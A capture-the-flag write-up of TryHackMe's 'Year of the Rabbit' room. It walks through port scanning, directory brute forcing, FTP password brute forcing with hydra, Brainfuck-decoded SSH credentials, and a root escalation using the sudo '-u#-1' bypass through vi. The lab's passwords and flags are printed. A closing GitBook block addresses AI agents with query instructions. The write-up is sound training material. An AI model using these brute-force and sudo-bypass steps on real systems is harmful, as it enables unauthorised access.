> For the complete documentation index, see [llms.txt](https://kunalwalavalkar.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kunalwalavalkar.gitbook.io/write-ups/tryhackme/easy/year-of-the-rabbit.md). # Year of the Rabbit {% embed url="" %} ## ## Task 1: Flags

### Question > What is the user flag? * Let's scan the target machine using `nmap`. ``` $ nmap -sC -sV 10.10.181.61 Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-06 22:24 IST Nmap scan report for 10.10.181.61 Host is up (0.13s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0) | ssh-hostkey: | 1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA) | 2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA) | 256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA) |_ 256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519) 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-title: Apache2 Debian Default Page: It works |_http-server-header: Apache/2.4.10 (Debian) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 31.36 seconds ``` * There are three open ports: | Port | Service | | ---- | ------- | | 21 | ftp | | 22 | ssh | | 80 | http | * We can brute force the directories of the webpage using `gobuster`. ``` $ gobuster dir -u http://10.10.181.61 -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.181.61 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.hta (Status: 403) [Size: 277] /.htpasswd (Status: 403) [Size: 277] /.htaccess (Status: 403) [Size: 277] /assets (Status: 301) [Size: 313] [--> http://10.10.181.61/assets/] /index.html (Status: 200) [Size: 7853] /server-status (Status: 403) [Size: 277] Progress: 4614 / 4615 (99.98%) =============================================================== Finished =============================================================== ``` * Let's go to the `assets/` directory.

* Let's check out the `style.css` file. We will avoid the `RickRolled.mp4` file for obvious reasons.

* So now we can go to `/sup3r_s3cr3t_fl4g.php`.

* If we click `OK` we just get Rick Rolled. * Let's intercept the request in Burpsuite.

* We can `Forward` this request.

* Let's see what is in the `/WExYY2Cv-qU` directory.

* We can download the `Hot_Babe.png` file using `wget`. ``` $ wget http://10.10.181.61/WExYY2Cv-qU/Hot_Babe.png --2023-12-06 23:00:36-- http://10.10.181.61/WExYY2Cv-qU/Hot_Babe.png Connecting to 10.10.181.61:80... connected. HTTP request sent, awaiting response... 200 OK Length: 475075 (464K) [image/png] Saving to: ‘Hot_Babe.png’ Hot_Babe.png 100%[========================================================================================================================================>] 463.94K 92.9KB/s in 5.0s 2023-12-06 23:00:42 (92.9 KB/s) - ‘Hot_Babe.png’ saved [475075/475075] ``` * Let's use the `strings` utility to see the strings present inside the file. ``` $ strings Hot_Babe.png -- snip --; Eh, you've earned this. Username for FTP is ftpuser One of these is the password: Mou+56n%QK8sr 1618B0AUshw1M A56IpIl%1s02u vTFbDzX9&Nmu? FfF~sfu^UQZmT 8FF?iKO27b~V0 ua4W~2-@y7dE$ 3j39aMQQ7xFXT Wb4--CTc4ww*- u6oY9?nHv84D& 0iBp4W69Gr_Yf TS*%miyPsGV54 C77O3FIy0c0sd O14xEhgg0Hxz1 5dpv#Pr$wqH7F 1G8Ucoce1+gS5 0plnI%f0~Jw71 0kLoLzfhqq8u& kS9pn5yiFGj6d zeff4#!b5Ib_n rNT4E4SHDGBkl KKH5zy23+S0@B 3r6PHtM4NzJjE gm0!!EC1A0I2? HPHr!j00RaDEi 7N+J9BYSp4uaY PYKt-ebvtmWoC 3TN%cD_E6zm*s eo?@c!ly3&=0Z nR8&FXz$ZPelN eE4Mu53UkKHx# 86?004F9!o49d SNGY0JjA5@0EE trm64++JZ7R6E 3zJuGL~8KmiK^ CR-ItthsH%9du yP9kft386bB8G A-*eE3L@!4W5o GoM^$82l&GA5D 1t$4$g$I+V_BH 0XxpTd90Vt8OL j0CN?Z#8Bp69_ G#h~9@5E5QA5l DRWNM7auXF7@j Fw!if_=kk7Oqz 92d5r$uyw!vaE c-AA7a2u!W2*? zy8z3kBi#2e36 J5%2Hn+7I6QLt gL$2fmgnq8vI* Etb?i?Kj4R=QM 7CabD7kwY7=ri 4uaIRX~-cY6K4 kY1oxscv4EB2d k32?3^x1ex7#o ep4IPQ_=ku@V8 tQxFJ909rd1y2 5L6kpPR5E2Msn 65NX66Wv~oFP2 LRAQ@zcBphn!1 V4bt3*58Z32Xe ki^t!+uqB?DyI 5iez1wGXKfPKQ nJ90XzX&AnF5v 7EiMd5!r%=18c wYyx6Eq-T^9#@ yT2o$2exo~UdW ZuI-8!JyI6iRS PTKM6RsLWZ1&^ 3O$oC~%XUlRO@ KW3fjzWpUGHSW nTzl5f=9eS&*W WS9x0ZF=x1%8z Sr4*E4NT5fOhS hLR3xQV*gHYuC 4P3QgF5kflszS NIZ2D%d58*v@R 0rJ7p%6Axm05K 94rU30Zx45z5c Vi^Qf+u%0*q_S 1Fvdp&bNl3#&l zLH%Ot0Bw&c%9 ``` * Let's save the password to a file called `ftp_passwords.txt`. * Now using `hydra` we can brute force the FTP login. ``` $ hydra -l ftpuser -P /home/kunal/tryhackme/yearoftherabbit/ftp_passwords.txt ftp://10.10.181.61 -t 4 Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-06 23:12:11 [DATA] max 4 tasks per 1 server, overall 4 tasks, 82 login tries (l:1/p:82), ~21 tries per task [DATA] attacking ftp://10.10.181.61:21/ [21][ftp] host: 10.10.181.61 login: ftpuser password: 5iez1wGXKfPKQ [STATUS] 82.00 tries/min, 82 tries in 00:01h, 1 to do in 00:01h, 3 active 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-06 23:13:12 ``` * So the password for `ftpuser` is `5iez1wGXKfPKQ`. * Let's login using those credentials. ``` $ ftp ftpuser@10.10.181.61 Connected to 10.10.181.61. 220 (vsFTPd 3.0.2) 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ``` * Let's look around for important files. ``` ftp> ls 200 EPRT command successful. Consider using EPSV. 150 Here comes the directory listing. -rw-r--r-- 1 0 0 758 Jan 23 2020 Eli's_Creds.txt 226 Directory send OK. ``` * We can download the `Eli's_Creds.txt` file to our machine using the `get` command. ``` ftp> get Eli's_Creds.txt local: Eli's_Creds.txt remote: Eli's_Creds.txt 200 EPRT command successful. Consider using EPSV. 150 Opening BINARY mode data connection for Eli's_Creds.txt (758 bytes). 100% |***********************************************************************************************************************************************************************************************| 758 0.74 KiB/s --:-- ETA 226 Transfer complete. 758 bytes received in 00:00 (2.40 KiB/s) ``` * Let's read the contents of the file. ``` $ cat Eli\'s_Creds.txt +++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->- --<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+ ++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+ +++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++< ]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+ ++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->--- --<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++ +<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+ ++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++ <]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++ <]>+. <+++[ ->--- <]>-- ---.- ----. < ``` * The text is in Brain Fuck. * We can use an online decoder to decode it.

* The password for the `eli` user is `DSpDiM1wAEwid`. * We can try to login through SSH using these credentials. ``` $ ssh eli@10.10.181.61 The authenticity of host '10.10.181.61 (10.10.181.61)' can't be established. ED25519 key fingerprint is SHA256:va5tHoOroEmHPZGWQySirwjIb9lGquhnIA1Q0AY/Wrw. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.181.61' (ED25519) to the list of known hosts. eli@10.10.181.61's password: 1 new message Message from Root to Gwendoline: "Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there" END MESSAGE eli@year-of-the-rabbit:~$ ``` * After a bit of searching we can find the `user.txt` file. ``` eli@year-of-the-rabbit:~$ cd ../gwendoline/ eli@year-of-the-rabbit:/home/gwendoline$ ls user.txt ``` * Let's try to read it. ``` eli@year-of-the-rabbit:/home/gwendoline$ cat user.txt cat: user.txt: Permission denied ``` * The user `eli` does not have the permission to read the `user.txt` file. * Let's try to find the `s3cr3t` mentioned in the message. ``` eli@year-of-the-rabbit:~$ locate s3cr3t /usr/games/s3cr3t /usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly! /var/www/html/sup3r_s3cr3t_fl4g.php ``` * We can now read the `.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!` file. ``` eli@year-of-the-rabbit:~$ cat /usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly! Your password is awful, Gwendoline. It should be at least 60 characters long! Not just MniVCQVhQHUNI Honestly! Yours sincerely -Root ``` * So now we know that the password for `gwendoline` user is `MniVCQVhQHUNI`. * Let's switch users. ``` eli@year-of-the-rabbit:~$ su gwendoline Password: gwendoline@year-of-the-rabbit:/home/eli$ ``` * We can now read the `user.txt` file we saw earlier. ``` gwendoline@year-of-the-rabbit:/home/eli$ cd /home/gwendoline/ gwendoline@year-of-the-rabbit:~$ cat user.txt THM{1107174691af9ff3681d2b5bdb5740b1589bae53} ``` ### Answer ``` THM{1107174691af9ff3681d2b5bdb5740b1589bae53} ``` ### ### What is the root flag? * We can check what commands `gwendoline` can execute using `sudo`. ``` gwendoline@year-of-the-rabbit:~$ sudo -l Matching Defaults entries for gwendoline on year-of-the-rabbit: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User gwendoline may run the following commands on year-of-the-rabbit: (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt ``` * Let's check the version of `sudo`. ``` gwendoline@year-of-the-rabbit:~$ sudo -V Sudo version 1.8.10p3 Sudoers policy plugin version 1.8.10p3 Sudoers file grammar version 43 Sudoers I/O plugin version 1.8.10p3 ``` * We can find an exploit for that version om Exploit-DB.

* Let's craft our exploit. ``` gwendoline@year-of-the-rabbit:~$ sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt ``` * Next we have to type the following:

* We must have `root` access. ``` gwendoline@year-of-the-rabbit:~$ sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt root@year-of-the-rabbit:/home/gwendoline# ``` * Let's get the root flag. ``` root@year-of-the-rabbit:/home/gwendoline# cd /root/ root@year-of-the-rabbit:/root# cat root.txt THM{8d6f163a87a1c80de27a4fd61aef0f3a0ecf9161} ``` ### Answer ``` THM{8d6f163a87a1c80de27a4fd61aef0f3a0ecf9161} ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kunalwalavalkar.gitbook.io/write-ups/tryhackme/easy/year-of-the-rabbit.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.